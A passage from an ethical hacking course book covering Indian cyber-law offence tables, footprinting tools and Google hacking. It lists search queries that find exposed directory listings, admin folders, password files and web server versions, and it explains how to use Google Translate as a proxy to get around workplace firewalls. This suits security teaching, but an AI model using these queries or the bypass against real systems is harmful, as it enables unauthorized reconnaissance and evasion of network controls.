if we are to control the cyber crime problem and make the Internet a safe
“place” for its users.
Cyber laws are meant to set the definite pattern, some rules and
guidelines that defined certain business activities going on through
internet legal and certain illegal and hence punishable. The IT Act 2000,
the cyber law of India, gives the legal framework so that information is
not denied legal effect, validity or enforceability, solely on the ground that
it is in the form of electronic records.

Cyberlaw is a much newer phenomenon having emerged much after the

onset of Internet. Internet grew in a completely unplanned and
unregulated manner. Even the inventors of Internet could not have really

18
computersecuritysystem.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 27
 Ethical Hacking Part I

anticipated the scope and far reaching consequences of cyberspace. The

growth rate of cyberspace has been enormous. Internet is growing rapidly
and with the population of Internet doubling roughly every 100 days,
Cyberspace is becoming the new preferred environment of the world.
With the spontaneous and almost phenomenal growth of cyberspace,
new and ticklish issues relating to various legal aspects of cyberspace
began cropping up.
In response to the absolutely complex and newly emerging legal issues
relating to cyberspace, CYBERLAW or the law of Internet came into being.
The growth of Cyberspace has resulted in the development of a new and
highly specialized branch of law called CYBERLAWS- LAWS OF THE
INTERNET AND THE WORLD WIDE WEB.

Cyber law is a generic term which refers to all the legal and regulatory
aspects of Internet and the World Wide Web. Cyber law is a generic term,
which denotes all aspects, issues and the legal consequences on the
Internet, the World Wide Web and cyber space. India is the 12th nation
in the world that has cyber legislation apart from countries like the US,
Singapore, France, Malaysia and Japan. The Information Technology
(Amendment) Act, 2008 was passed by both the Houses of Parliament on
23.12.08. The Act was notified after the assent of the Hon’ble President
on 5.2.2009 and Amended on 27th October 2009.

2.6. Offences under the IT Act and Indian Penal Code (IPC)
Indian Penal Code (Hindi: Bhartiya Dand
Sanhita) is a document that covers almost all the
crime happening in the society. It is a piece of
British colonial legislation dating from 1860.
Now it provides a penal code for all of India. The
code applies to any offence committed by an
Indian Citizen anywhere and on any Indian
registered ship or aircraft. Indian Penal Code
came into force in 1862 (during the British Raj)
and is regularly amended, such as to include
section 498-A. and contains several sections
related to other law in India and has a total of
511 sections covering various aspects of the
Criminal Law. The natures of these have led to allegations of abuse of
those laws.19

19
gcsl.in
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 28
 Ethical Hacking Part I

2.6.1. Important Cyber law Provisions in India under IT Act

Offence Section Imprisonment/fine

under
IT Act
Tampering with Computer source Sec.65 Up to 3 years /
documents 2lakhs/ Both
Hacking with Computer systems, Data Sec.66 Up to 3 years /
alteration 5lakhs/ Both
Punishment for sending offensive Sec.66A
messages through communication -DO-
service, etc
Punishment for dishonestly receiving Sec.66B Up to 3 years /
stolen computer resource or 1lakhs/ Both
communication device
Punishment for identity theft Sec.66C Up to 3 years
/1lakhs
Punishment for cheating by personating Sec.66D Up to 3 years
by using computer resource /1lakhs
Punishment for violation of privacy Sec.66E Up to 3 years /
2lakhs/ Both
Punishment for cyber terrorism Sec.66F Imprisonment/
imprisonment for
life’

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 29

 Ethical Hacking Part I

Offence Section Imprisonment/fine

under
IT Act
Publishing obscene information in Sec.67 5-7 years/10lakhs
electronic form
Punishment for publishing or Sec.67A
transmitting of material containing
-DO-
sexually explicit act, etc. in electronic
form
Punishment for publishing or Sec.67B -DO-
transmitting of material depicting
children in sexually explicit act, etc. in
electronic form
Preservation and Retention of Sec.67C 3 years / depends
information by intermediaries
Un-authorized access to protected Sec.70 10 years/ depends
system
Penalty for misrepresentation Sec.71 2 years/1lakhs
Breach of Confidentiality and Privacy Sec.72 2 years/1lakhs
Punishment for Disclosure of Sec.72A 3years/5lakhs/both
information in breach of lawful contract
Publishing false digital signature Sec.73 2years/1lakhs/both
certificates
Publication for fraudulent purpose Sec.74 2years/1lakhs/both
Punishment for attempt to commit Sec.84C one-half year/
offences depends
Compensation for damage to computer Sec.43 3years/5lakhs/both
systems

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 30

 Ethical Hacking Part I

2.6.2. Computer Related Crimes Covered under Indian Penal Code

and Special Laws

Offence Section Imprisonment/fi

ne
Sending threatening messages by Sec 503,506 3-5 years /
email IPC depends / both
Sending defamatory messages by Sec 499, 500 2 years / depends
email IPC / both
Forgery of electronic records Sec 463, 464, 3-7 years
468,469 IPC /depends
Forgery Sec 463 2 years / depends
/ both
Making a false document Sec 464 2 years / depends
/ both
Forgery for purpose of cheating Sec 468 7 years /depends
Forgery for purpose of harming Sec 469 3 years /depends
reputation
Bogus websites, cyber frauds Sec 420 IPC 7 years /depends
Web-Jacking Sec 383 IPC 3 years / depends
/ both
E-Mail Abuse, Online Defamation Sec 500, 509 3-5 years /
IPC depends / both
Punishment for defamation Sec 500 2 years /depends
Word, gesture or act intended to Sec 509 1 years /depends
insult the modesty of a woman
Criminal Intimidation by E-mail or Sec 506, 507 2 -5 years
Chat /depends
Punishment for criminal Sec 506 2 years /depends
intimidation
Criminal intimidation by an Sec 507 2 years /depends
anonymous communication
Online sale of Drugs NDPS Act Up to 10 years/
depends/ both

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 31

 Ethical Hacking Part I

Offence Section Imprisonment/fi

ne
Online sale of Arms Arms Act Up to 3 years/
depends/ both

Piracy Sec. 51, 63, 63 1 years /1 lac

B Copyright act
Obscenity Sec. 2-7 year /
292,293,294 depends /both
IPC, Indecent
Representation
of Women Act
Sale, etc., or obscene books, etc Sec. 292 2 -5years & 2000
– 5000
Printing etc. of grossly indecent or Sec. 292A 2 years/depends
scurrilous matter or matter
intended for blackmail
Sale, etc., of obscene objects to Sec. 293 2-7 years/ 2-5000
young person
Obscene acts and songs in public Sec. 294 3 month with fine
place
Theft of Computer Hardware Sec. 378, 379 3 -5
years/depends/
both
Theft Sec. 378
Punishment for theft Sec. 379 3 years/depends/
both
punishment for cheating and Sec. 420 Up to 3 years /
dishonestly depends / both
Punishment of criminal conspiracy Sec. 120B 6 Month /
depends /both

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 32

 Ethical Hacking Part I

2.6.3. Other Offences under IT Act & IPC

Section Imprisonment/
Offence
fine
292,389,420,465,467,468,471,
Blackmailing Mentioned Above
474 IPC r/w & 67 of IT Act
Creating Fake 67 IT Act, 507, 509 of IPC.
Mentioned Above
Profile
66 of IT Act & 120(B),
Credit Card Fraud Mentioned Above
420, 467, 468, 471 of IPC.
420/408/120B IPC R/W 66 IT
Data Theft Mentioned Above
Act
420, 465, 467, 468, 471, 34 of IPC
Fake Travel Agent
r/w 143 of Indian Railway Act Mentioned Above
1989.
Hacking 66 & 67 of IT Act Mentioned Above
Hosting Obscene 67 of IT Act 2000,469,509 of the
Mentioned Above
Profiles IPC.
Illegal Money 467, 468, 471, 379, 419, 420, 34
Mentioned Above
Transfer of IPC & 66 of IT Act.
Morphed 67 of IT Act, 120-B, 506, 509 IPC
Mentioned Above
Photographs
Intellectual 65 and 66 of the IT Act 2000, 381,
Mentioned Above
Property Theft 420 of the IPC.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 33

 Ethical Hacking Part I

Section Imprisonment/
Offence
fine
67 of IT Act 2000 r/w sec 2 of
Obscene E-Mails
Indecent Representation of Women Mentioned Above
(Prohibition) Act 1986.
Obscene Phone 67 of IT Act 2000
Mentioned Above
Calls
Online Railway 420 IPC
Mentioned Above
Ticket Fraud
Online Stock 420/120B IPC
Mentioned Above
Exchange Fraud
Sexual 419/501/507/509 IPC and 67 IT
Mentioned Above
Harassment Act 2000.
Email Spoofing Section 465, 419 IPC Mentioned Above

Email Bombing Section 66 IT Act Mentioned Above

Denial Of Service Section 43 IT Act Mentioned Above
Attacks
Virus Attacks Section 43, 66 IT Act Mentioned Above

Salami Attacks Section 66 IT Act Mentioned Above

Logic Bombs Section 43, 66 IT Act Mentioned Above

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 34

 Ethical Hacking Part I

Section 43, Under IT Act

Section Offence Punishment

accesses or secures access to such a

damages by the way of
Sec. 43 computer, computer system or
compensation to the
(a) computer network or computer
person affected
resource;

downloads, copies or extracts any

data, computer data base or
information from such computer, damages by the way of
Sec. 43
computer system or computer compensation to the
(b)
network including information or data person affected
held or stored in any removable
storage medium;

introduces or causes to be introduced

any computer contaminant or damages by the way of
Sec. 43
computer virus into any computer, compensation to the
(c)
computer system or computer person affected
network;

damages or causes to be damaged any

computer, computer system or
damages by the way of
Sec. 43 computer network, data, computer
compensation to the
(d) data base or any other programmes
person affected
residing in such computer, computer
system or computer network;

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 35

 Ethical Hacking Part I

Section Offence Punishment

disrupts or causes disruption of any damages by the way of

Sec. 43
computer, computer system or compensation to the
(e)
computer network; person affected

denies or causes the denial of access

damages by the way of
Sec. 43 to any person authorized to access
compensation to the
(f) any computer, computer system or
person affected
computer network by any means;

provides any assistance to any person

to facilitate access to a computer,
damages by the way of
Sec. 43 computer system or computer
compensation to the
(g) network in contravention of the
person affected
provisions of this Act, rules or
regulations made there under;

charges the services availed of by a

person to the account of another
damages by the way of
Sec. 43 person by tampering with or
compensation to the
(h) manipulating any computer,
person affected
computer system, or computer
network;

destroys, deletes or alters any

information residing in a computer damages by the way of
Sec. 43
resource or diminishes its value or compensation to the
(i)
utility or affects it injuriously by any person affected
means;

steals, conceals, destroys or alters or

causes any person to steal, conceal, damages by the way of
Sec. 43
destroy or alter any computer source compensation to the
(j)
code used for a computer resource person affected
with an intention to cause damage;

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 36

 Ethical Hacking Part I

2.7. Measures to Prevent Cyber Crime20

The Information Technology Act 2000 was passed when the country was
facing the problem of growing cyber crimes. Since the Internet is the
medium for huge information and a large base of communications
around the world, it is necessary to take certain precautions while
operating it.

Any person who operates the net should always abide by and following
principles:

 He should not disclose any personal information to any one and

especially to strangers.

 Updated and latest anti-virus software should be used to

protect the computer system against
virus attacks.

 While chatting on the net one should

avoid sending photographs to
strangers along with personal data
as it can be misused.

 Backup volumes of the data should

always be kept to prevent loss from
virus contamination.

 Children should be prevented from

accessing obscene sites by the parents to protect them from
spoiling their mind and career.

 A credit card number shall never be sent to an unsecured site

to prevent fraud or cheating.

 Effort shall be made to make a security code and program to

guard the computer system from misuse.

 Routers and firewalls can be used to protect the computer

network.

20
http://www.mondaq.com/india/x/28603/technology/Cyber+Crimes
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 37
 Ethical Hacking Part I

 A check should be kept on the functioning of cyber cafes and

any mishaps shall be reported to the concerned authorities.

 Efforts should be made to discourage misuse of computers and

access to unauthorized data.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 38

 Ethical Hacking Part I

CHAPTER 3
OS FOOTPRINTING

Objective
3.1 Introduction of Footprinting
3.2 Information Gathering
3.3 Tools of OS Footprinting

3.1 Introduction of Footprinting

Footprinting is part of the preparatory pre-attack phase and involves
accumulating data regarding target's environment and architecture,
usually for the purpose of finding ways to intrude into that environment.
This is the easiest way for hackers to gather information about computer
systems and the companies they belong to. The purpose of this
preparatory phase into learns as much as you can about a system, its
remote access capabilities, its ports and services, and any specific
aspects of its security.

3.1.1 Footprinting Term

21

Footprinting is defined as the process of creating a blueprint or map of an

organization’s network and systems. Information gathering is also known
as Footprinting an organization. Footprinting begins by determining the
target system, application, or physical location of the target. Once this
information is known, specific information about the organization is
gathered using nonintrusive methods. For example, the organization’s
own web page may provide a personnel directory or a list of employee
bios, which may prove useful if the hacker needs to use a social
engineering attack to reach the objective.
21
hackingdictionaryblog.blogspot.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 39
 Ethical Hacking Part I

A hacker may also do a Google search or a Yahoo! People search to locate

information about employees.

The Google search engine can be used in creative ways to perform

information gathering. Blogs, newsgroups, and press releases are also
good places to find information about the company or employees.
Corporate job postings can provide information as to the type of servers
or infrastructure devices a company may be using on its network. Other
information obtained may include identification of the Internet
technologies being used, the operating system and hardware being used,
active IP addresses, e-mail addresses and phone numbers, and corporate
policies and procedures.

* Generally, a hacker spends 90 percent of the time profiling and gathering

information on a target and 10 percent of the time launching the attack. 22

3.1.2 Information Gathering Methodology23

Information gathering can be broken into seven logical steps. The

footprinting process is performed during the first two steps of unearthing
initial information and locating the network range. Some of the common
sources used for information gathering include the following:



Domain name lookup


Whois


Nslookup
Sam Spade

22
http://technovortex.blogspot.in/2011/09/footprinting-tutorial-information.html
23
http://my.safaribooksonline.com/book/certification/ceh/9780470525203/gathering-target-information-
reconnaissance-footprinting-and-social-engineering/information-gathering_methodology
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 40
 Ethical Hacking Part I

Information gathering Steps

Performing Whois requests, searching Domain Name System (DNS)

tables, and scanning IP addresses for open ports are other forms of open
source Footprinting. Most of this information is fairly easy to get and
legal to obtain.

3.2 Information Gathering (Footprinting) can be done by

using

3.2.1 Extracting Archive of Website using www.archive.org

The Internet Archive (IA) is a nonprofit organization dedicated to building

and maintaining a free and openly accessible online digital library,
including an archive of the World Wide Web. The Internet Archive was
founded by Brewster Kahle in 1996.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 41

 Ethical Hacking Part I

24

Nonprofit organization established to preserve Web sites by taking

regular "snapshots". The Wayback Machine provides links to older
versions of a webpage.

24
www.archive.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 42
 Ethical Hacking Part I

25

3.2.2 Use of Google Earth

It is a virtual globe, map and geographic information program that was

originally called Earth Viewer 3D, and was created by Keyhole, Inc, a
company acquired by Google in 2004. It maps the Earth by the
superimposition of images obtained from satellite imagery, aerial
photography and GIS 3D globe. It is available under three different
licenses: Google Earth, a free version with limited functionality; Google
Earth Plus (discontinued), which included additional features; and
Google Earth Pro ($400 per year), which is intended for commercial use.

25
www.archive.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 43
 Ethical Hacking Part I

Once you download and install Google Earth, your computer becomes a
window to anywhere, allowing you to view high-resolution aerial and
satellite imagery, photos, elevation terrain, road and street labels,
business listings, and more.

26

26
http://en.wikipedia.org/wiki/Google_Earth
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 44
 Ethical Hacking Part I

27

1. Search panel - Use this to find places and directions and manage
search results. Google Earth EC may display additional tabs here.

2. Overview map - Use this for an additional perspective of the

Earth.

3. Hide/Show sidebar - Click this to conceal or the display the side

bar (Search, Places and Layers panels).

4. Placemark - Click this to add a placemark for a location.

5. Polygon - Click this to add a polygon.

6. Path - Click this to add a path (line or lines).

27
http://earth.google.com/intl/ar/userguide/v4/index.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 45
 Ethical Hacking Part I

7. Image Overlay - Click this to add an image overlay on the Earth.

8. Measure - Click this to measure a distance or area size.

9. Sun - Click this to display sunlight across the landscape.

10. Sky - Click this to view stars, constellations, galaxies, planets and
the Earth's moon.

11. Email - Click this to email a view or image.

12. Print - Click this to print the current view of the Earth.

13. Show in Google Maps - Click this to show the current view in
Google Maps in your web browser.

15. Navigation controls - Use these to zoom, look and move around.

16. Layers panel - Use this to display points of interest.

16. Places panel - Use this to locate, save, organize and revisit place
marks.

17. Add Content - Click this to import exciting content from the KML
Gallery

18. 3D Viewer - View the globe and its terrain in this window.

19. Status bar - View coordinate, elevation, imagery date and

streaming status here.

3.2.3 Use of Job Sites to gather information of companies

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 46

 Ethical Hacking Part I

3.3. OS Footprinting tools

3.3.1.Sam Spade (http://www.samspade.org) is a website that contains

a collection of tools such as Whois, nslookup, and traceroute.
Because they are located on a website, these tools work for any
operating system and are a single location for providing
information about a target organization.

28

3.3.2.DNS Enumeration

DNS enumeration is the process of locating all the DNS servers and their
corresponding records for an organization. A company may have both
internal and external DNS servers that can yield information such as
usernames, computer names, and IP addresses of potential target
systems. NSlookup, DNSstuff, the American Registry for Internet
Numbers (ARIN), and Whois can all be used to gain information that can
then be used to perform DNS enumeration.

28
http://www.samspade.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 47
 Ethical Hacking Part I

Nslookup and DNSstuff

One powerful tool you should be familiar with is nslookup (see Figure
below). This tool queries DNS servers for record information. It’s included
in UNIX, Linux, and Windows operating systems.

29

Hacking tools such as Sam Spade also include nslookup tools.

Building on the information gathered from Whois, you can use nslookup
to find additional IP addresses for servers and other hosts. Using the
authoritative name server information from Whois (AUTH1.NS.NYI.NET),
you can discover the IP address of the mail server. The explosion of easy-
to-use tools has made hacking easy, if you know which tools to use.

DNSstuff is another of those tools. Instead of using the command-line

nslookup tool with its cumbersome switches to gather DNS record
information, just access the website http://www.dnsstuff.com, and you
can do a DNS record search online.

3.3.3.Sensepost Footprint Tools

SensePost is an independent and objective organization specializing in

information security consultation and assessment services. For all our
assessment we apply strict methodologies. This is especially true for
Internet Security Assessments, where our methodology has been
developed and tuned over many years. One of the challenges that
analysts at SensePost faced when engaging in assessments with
enterprise-sized clients was applying this tried and tested methodology in
an efficient and timely fashion. The requirement was to automate as
much of the mundane processes in this methodology as possible whilst
maintaining a high level of accuracy.

29
info-logy.blogspot.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 48
 Ethical Hacking Part I

 BiDiBLAH is a footprinting tool developed by SensePost to

specifically relieve our analysts from performing repetitive processes,
thus increasing efficiency, improving accuracy and allowing them to
concentrate on the areas of the assessment that require manual
attention. It also means that important aspects of the methodology
are contained and standardized in one entity, the tool. This in turn
means that you eliminate the potential risk of data loss and ensure
all assessments are conducted against the same accepted standard.



BiLE.pl


BiLE-weigh.pl


tld-expand.pl


vet-IPrange.pl


qtrace.pl


vet-mx.pl


jarf-rev
jarf-dnsbrute

3.3.4.Other tools

 Big Brother

Big Brother Professional Edition (BBPE) is a simple way to measure

the health of your heterogeneous IT environment at-a-glance. It's an
easy-to-implement, affordable, web-based solution for IT
infrastructure monitoring and diagnostics. Get real-time monitoring
for any server (Windows, UNIX, and Linux) or device, on any network,
from any web browser, anywhere in the world. Simply follow the "red
light" to detect, diagnose and resolve any alert – before it becomes an
issue.

 Bile-Suite

The BiLE suite includes a number of PERL scripts that can be used
by a Penetration Tester to aid in the enumeration phase of a test.
BiLE itself stands for Bi-directional Link Extraction utilities. The suite
of tools essentially can be used in the footprinting process to find both
obvious and non-obvious relationships between disparate. With this
information a Pen Tester may then decide to try and access sites with
close relationships to the target as a means of a stepping stone into
the target network.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 49

 Ethical Hacking Part I

Note: - This process depends on the fact that the linked sites you
plan to attack to get thru to your target are actually owned by the
target company and are in the scope of the test.

 Alchemy Network Tool

Alchemy Network Tools is a software package containing a set of
network analysis and diagnostic utilities that help network
administrators maintain and manage their networks in the nice
graphical interface. Alchemy Network Tools contains the following
network utilities:

 Ping
 Traceroute
 NSLookup
 Whois
 HTTP/HTTPS request sender
 SNMP request sender

The program also displays information about the local computer

network settings and traffic snapshot:

 Route table
 IP packet statistics
 ICMP statistics
 TCP statistics
 UDP statistics

 Advanced Administrative Tool (AATools)

AATools includes 12 different state-of-the-art tools for assessing

optimizing, managing, and safeguarding your network and computers,
all in one easy to use program. It performs an inspection on
everything vital to network security as it pertains to the protection of
your computer, including the utilization of tools to check open ports,
proxies, email lists, Internet applications, and general system
information.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 50

 Ethical Hacking Part I

 My IP Suite

My IP Suite is network tool to work with IP addresses. It combines

Domain-to-IP Converter, Batch Ping, Tracert, Whois, Website Scanner
and Connection Monitor into a single interface as well as an IP-to-
Country Converter.

With the powerful IP & Web tool you can:

1. Lookup IP addresses for a single or list of domain names and
vice versa.
2. Find out the country associated with a single or list of domains
or IP addresses.
3. Perform batch and continuous pings on multiple servers.
4. Trace IP addresses to their destination and investigate
connection problems.
5. Obtain all available information on a given IP address or domain
name such as Organization or the ISP that owns the IP address,
including the country, state, city, address, contact phone
numbers and e-mails.
6. Determine name, date, last-modified, version and operation
system of the remote web server.
7. Allow you to scan any given web site and produce a list of links
found in the site, using several criteria to filter the results.
8. Monitor all the TCP/IP connections from your computer to the
internet automatically.
9. Get all of the information about the website currently open in
the Internet Explorer

 Wikto Footprinting Tool

Wikto is a tool that checks for flaws in webservers. It provides much

the same functionality as Nikto but adds various interesting pieces of
functionality, such as a Back-End miner and close Google integration.

Wikto provides the same functionality as the Nikto tool. But it goes a
little further. There are 3 main sections of the tool. These are : Back-
End miner, Nikto-like functionality and googler

Some more tools are available find it through web surfing on EC

council module for Ethical Hacking.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 51

 Ethical Hacking Part I

CHAPTER 4

GOOGLE HACKING

Objective

4.1 Introduction of GOOGLE

4.2 Uses of Google Hacking Database
4.3 Google hacking techniques
4.4 Preventing Google hacking attacks

4.1. Google Hacking

Google hacking is a computer hacking technique that uses Google

Search and other Google applications to find security holes in the
configuration and computer code that websites use.

Google hacking is the use of a search engine, such as Google, to locate a

security vulnerability on the Internet. There are generally two types of
vulnerabilities to be found on the Web: software vulnerabilities and mis-
configurations. Although there are some sophisticated intruders who
target a specific system and try to discover vulnerabilities that will allow
them access, the vast majority of intruders start out with a specific
software vulnerability or common user mis-configuration that they
already know how to exploit, and simply try to find or scan for systems
that have this vulnerability.

4.2. Uses of Google Hacking Database

Information that the Google Hacking Database identifies:

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 52

 Ethical Hacking Part I

 Advisories and server vulnerabilities

 Error messages that contain too much information
 Files containing passwords
 Sensitive directories
 Pages containing logon portals
 Pages containing network or vulnerability data such as firewall
logs.30

4.3. Google Hacking Techniques

Use of Google by formulating complex search queries, in order to filter

through large amount of result pages and to display only highly targeted
information is termed as Google Hacking.

Google Hacking is used as a Technique to find information pertaining to

information security of a Target. Using Google Hacking, an Attacker can
find Security Vulnerabilities and other Important Data on a Web Server
(which otherwise is maintained, only for use by an Authorized
Personnel).

4.3.1. Anonymity with Caches31

Google’s cache feature is truly an amazing thing. The simple fact is that if
Google crawls a page or document, you can almost always count on
getting a copy of it, even if the original source has since dried up and
blown away. Of course the down side of this is that hacker scan gets a
copy of your sensitive data even if you’ve pulled the plug on that pesky
Webserver. Another down side of the cache is that the bad guys can
crawl your entire Web site without even sending a single packet to your
server. If your Web server doesn’t get so much as a packet, it can’t write
anything to the log files. If there’s nothing in the log files, you might not
have any idea that your sensitive data has been carried away. It’s sad
that we even have to think in these terms, but untold megabytes,
gigabytes, and even terabytes of sensitive data leak from Web servers
every day. Understanding how hackers can mount an anonymous attack
on your sensitive data via Google’s cache is of utmost importance.

Privacy-providing tools, including tools that provide anonymity, are

gaining popularity in the modern world. Among the goals of their users is
30
nolimite.webcindario.com
31
books.google.co.in/books?isbn=1597491764
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 53
 Ethical Hacking Part I

avoiding tracking and profiling. Currently, users interested in

anonymous browsing have the choice only between single-hop proxies
and the few more complex systems that are available. These still leave
the user vulnerable to long-term intersection attacks.

4.3.2. Using Google as a Proxy Server

It is about how to bypass office proxy server or school firewall to surf

those blacked-listed websites, by using Google Application tools as
second legit proxy server!

32

a. How to use Google.com as proxy server to surf blocked/banned

websites?

Google language translator tool can surf and perform language

translation on websites or articles. Ordinary people, like me, will simply
use it as a language translator, to translate a web page into English or
mother-tongue. But, you can also use the Google language tool as a
proxy server to surf banned/black-listed web pages!

Of course, there are other language translators (e.g. Alta-Vista Babel

Fish) to easily serve the same purpose. But, as I said just now,
Google.com is less likely is banned/blocked by any proxy servers or
firewalls in the Earth.

32
walkernews.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 54
 Ethical Hacking Part I

Though, this trick will be failed too if some smart proxy servers is used to
scan the whole URL for prohibited string/keywords.

But, if you are going to use Google language translator as proxy server to
surf blocked web pages in English, which is your mother-tongue or the
only language you understand, you may feel disappointed. There is no
English to English translation in the option menu.

Just try to use “Spanish to English”, “French To English”, “German to

English”, “Japanese To English”, etc, will do the job.
This trick will work, as a German web page will not be 100% written in
German language. So, Google language translator will only convert the
German words and statements to English, otherwise no conversion will
be done!

For example, this is how you use the Google language translator tool to
surf torrentscan.com, torrentz.com, etc, in office with the damn squid
proxy server. If you do able to see these black-listed sites, then Using
Google language translator tool as second proxy server will work for your
case!

b. How to use Google language translator tool as a proxy server?

It is done by using Google’s translator and changing the url to translate

English to English like this

http://www.google.com/translate?langpair=en|en&u=www.website.coma
nd changing website.com to what website you can’t get on.

In the url you can see en|en that is the bit that tells Google to translate
English to English, you can also do it with many languages just need to
know what the letters to use, i no French to French is fr|fr.

It may not work with every firewall, or with every site you want to visit,
but it could be worth a try if you need to, say, finish your online holiday
shopping and your boss is an ecommerce-blocking Scrooge. Anyway, this
trick is only works for text. The multimedia contents such as jpeg
pictures, quick time movie, real media files, etc, will not working
(displaying).Never mind, you can try with another Google Application tool
called Google Wireless Transcoder.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 55

 Ethical Hacking Part I

This Google Application is developed to convert a normal web page into

format that is optimized for rendering in WAP browser, such as those
web browser in wireless PDA, 3G smart-phone (such as Nokia N95,
Dopod C838P), etc.

Google Wireless Transcoder will download the target web page, including
those jpeg pictures of the site, and reformat the web page layout for best
viewing in mini web browser of smart-phones.

4.3.3. Directory Listings

Web server applications such as Apache and IIS provide facilities that a
user can browse and navigate website directories by clicking on the
directory name and links such as Parent Directories. The directories and
their content can be listed if directory listing or directory browsing are
enabled by the administrator. This vulnerability gives an unauthorized
access to the files and it may help hackers to gain access to the
information which can help them to hack a website or a web server or
download its contents.

Directory listings make the parent directory links available to browse

directories and files. Hackers can locate the sensitive information and
files just by simple browsing. In Google it is easy to find websites or web
servers with enabled directory listings because the title of the pages start
with the “index of” phrase so we can use index of in the search box to
find the directory listings-enabled website. If we want to get better result
from our search we can use this combination in the search box
intitle:index.of or we can use intitle:index.of “Parent Directory”.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 56

 Ethical Hacking Part I

33

Figure 4.1: The result of using intitle:index.of “Parent Directory”.

It is obvious that with the first command we used the Google search
engine to search in its database for the websites which have been listed
with the title of “Index of”. In the second command we used Google to
search for sites with the directory listings and with the keyword which is
often found in the directory listings.

Figure 4.2: A typical directory listing

Directory listings provide a list of files and directories in a browser

window instead of the typical text-and graphics mix generally associated
with web pages. These pages offer a great environment for deep
information gathering.

33
www.google.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 57
 Ethical Hacking Part I

a. Locating Directory Listings

Locating directory listings with Google is fairly straightforward. Figure

2shows that most directory listings begin with the phrase Index of, this
also shows in the title. An obvious query to find this type of page might
be intitle:index.of, which may find pages with the term index of in the
title of the document. Unfortunately, this query will return a large
number of false positives, such as pages with the following titles:

 Index of Native American Resources on the Internet

 LibDex—Worldwide index of library catalogues
 IowaState Entomology Index of Internet Resources

Judging from the titles of these documents, it's obvious that not only are
these web pages intentional, they're also not the directory listings we're
looking for. Several alternate queries provide more accurate results:

intitle:index.of "parent directory"

intitle:index.of name size

These queries indeed provide directory listings by not only focusing on

index.of in the title, but on keywords often found inside directory listings,
such as parent directory, name, and size. Obviously, this search can be
combined with other searches to find files of directories located in
directory listings.

b. Finding Specific Directory

Hackers can locate specific directories by using the directory name in

their search queries. For instance to locate an “admin” directory in
addition to directory listings, the hacker can use these commands:
intitle:index.of.admin or intitle:index.ofinurl:admin.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 58

 Ethical Hacking Part I

Figure 4.3: The result of using intitle:index.of.admin.34

c. Finding Specific File

It is possible to search for a certain file by directory listings. For instance,

to search for the password.mdb file, this search query can be used:
intitle:index.of password.mdb .

d. Finding Specific File Extension

Google lets users search its database for a specific file extension by using
the filetype: command. For instance, if you want to search for pdf files,
then you can use the query filetype:pdf in the search box.

e. Server Versioning: Obtaining the Web Server Software/Version

The exact version of the web server software running on a server is one
piece of information an attacker needs before launching a successful
attack against that web server. If an attacker connects directly to that
web server, the HTTP (web) headers from that server can provide this
essential information. It's possible, however, to retrieve similar

34
www.google.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 59
 Ethical Hacking Part I

information from Google's cache without ever connecting to the target

server under investigation. One method involves using the information
provided in a directory listing.
Figure 4.4 shows the bottom line of a typical directory listing. Notice that
the directory listing includes the name of the server software as well as
the version. An adept web administrator can fake this information, but
often it's legitimate, allowing an attacker to determine what attacks may
work against the server.

Figure 4.4 Directory listing server

This example was gathered using the following query:

intitle:index.of server.at
This query focuses on the term index ofin the title and server at
appearing at the bottom of the directory listing. This type of query can
also be pointed at a particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.comand vidup-
r1.blue.aol.com both run Apache web servers.
It's also possible to determine the version of a web server based on
default pages installed on that server. When a web server is installed, it
generally will ship with a set of default web pages, like the Apache 1.2.6
page shown in Figure 4.5:

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 60

 Ethical Hacking Part I

Figure4.5: Apache test page35

These pages can make it easy for a site administrator to get a web server
running. By providing a simple page to test, the administrator can simply
connect to his own web server with a browser to validate that the web
server was installed correctly. Some operating systems even come with
web server software already installed. In this case, an Internet user may
not even realize that a web server is running on his machine.
This type of casual behavior on the part of an Internet user will lead an
attacker to rightly assume that the web server is not well maintained,
and by extension is insecure. By further extension, the attacker can
assume that the entire operating system of the server may be vulnerable
by virtue of poor maintenance.

The following table provides a brief rundown of some queries that can
locate various default pages.

35
www.cayelle.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 61
 Ethical Hacking Part I

Apache Server Query

Version

Apache 1.3.0– Intitle:Test.Page.for.ApacheIt.worked! this.web.site!

1.3.9

Apache 1.3.11– Intitle:Test.Page.for.Apacheseeing.this.instead

1.3.26

Apache 2.0 Intitle:Simple.page.for.ApacheApache.Hook.Functions

Apache Intitle:test.page "Hey, it worked !" "SSL/TLS-aware"

SSL/TLS

Many IIS intitle:welcome.tointitle:internet IIS

servers

Unknown IIS intitle:"Under construction" "does not currently have"

server

IIS 4.0 intitle:welcome.to.IIS.4.0

